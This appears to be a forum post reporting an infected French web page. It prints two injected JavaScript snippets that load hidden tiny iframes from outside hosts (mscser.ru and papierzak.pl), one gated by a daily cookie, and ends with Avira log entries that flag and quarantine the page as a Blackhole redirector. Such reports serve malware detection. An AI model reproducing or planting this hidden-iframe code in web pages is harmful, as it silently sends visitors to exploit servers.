http://pellirojo.free.fr/

fireold

1. if (document.getElementsByTagName('body')[0]) {
   
2.       iframer();
   
3.   } else {
   
4.       document.write("<iframe src='http://mscser.ru/in.php?a=QQkFBwQEAAADBgAGEkcJBQcEAQwMBAEABA==' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
   
5.   }
   
6.   function iframer() {
   
7.       var f = document.createElement('iframe');
   
8.       f.setAttribute('src', 'http://mscser.ru/in.php?a=QQkFBwQEAAADBgAGEkcJBQcEAQwMBAEABA==');
   
9.       f.style.visibility = 'hidden';
   
10.       f.style.position = 'absolute';
    
11.       f.style.left = '0';
    
12.       f.style.top = '0';
    
13.       f.setAttribute('width', '10');
    
14.       f.setAttribute('height', '10');
    
15.       document.getElementsByTagName('body')[0].appendChild(f);
    
16.   }

复制代码

1. function zzzfff() {
   
2.     var mtqe = document.createElement('iframe');
   
3. 
   
4.     mtqe.src = 'http://papierzak.pl/rel.php';
   
5.     mtqe.style.position = 'absolute';
   
6.     mtqe.style.border = '0';
   
7.     mtqe.style.height = '1px';
   
8.     mtqe.style.width = '1px';
   
9.     mtqe.style.left = '1px';
   
10.     mtqe.style.top = '1px';
    
11. 
    
12.     if (!document.getElementById('mtqe')) {
    
13.         document.write('<div id=\'mtqe\'></div>');
    
14.         document.getElementById('mtqe').appendChild(mtqe);
    
15.     }
    
16. }
    
17. 
    
18. function SetCookie(cookieName, cookieValue, nDays, path) {
    
19.     var today = new Date();
    
20.     var expire = new Date();
    
21.     if (nDays == null || nDays == 0) nDays = 1;
    
22.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
    
23.     document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
    
24. }
    
25. 
    
26. function GetCookie(name) {
    
27.     var start = document.cookie.indexOf(name + "=");
    
28.     var len = start + name.length + 1;
    
29.     if ((!start) && (name != document.cookie.substring(0, name.length))) {
    
30.         return null;
    
31.     }
    
32.     if (start == -1) return null;
    
33.     var end = document.cookie.indexOf(";", len);
    
34.     if (end == -1) end = document.cookie.length;
    
35.     return unescape(document.cookie.substring(len, end));
    
36. }
    
37. if (navigator.cookieEnabled) {
    
38.     if (GetCookie('visited_uq') == 55) {} else {
    
39.         SetCookie('visited_uq', '55', '1', '/');
    
40. 
    
41.         zzzfff();

复制代码

Avira

2013/10/2 下午 07:02 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\AVC3APW1\pellirojo_free_fr[1].htm'
      包含病毒或有害的程式 'JS/BlacoleRef.CZ.11' [virus]
      已採取動作：
      檔案會移動至 '540d516b.qua' 名稱底下的隔離區目錄。.

2013/10/2 下午 07:02 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數：        783
      目錄數：        0
      惡意程式碼數：        1
      警告數：        0

2013/10/2 下午 07:01 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\AVC3APW1\pellirojo_free_fr[1].htm 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.CZ.11 [virus]'
      執行的動作：傳輸至掃描程式

2013/10/2 下午 07:00 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\AVC3APW1\pellirojo_free_fr[1].htm 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.CZ.11 [virus]'
      執行的動作：拒絕存取

2013/10/2 下午 07:00 [Web Protection] 發現惡意程式碼
      從 URL "http://pellirojo.free.fr/" 存取資料時，
      發現病毒或有害的程式 'JS/BlacoleRef.CZ.11' [virus]。
      已採取動作：已略過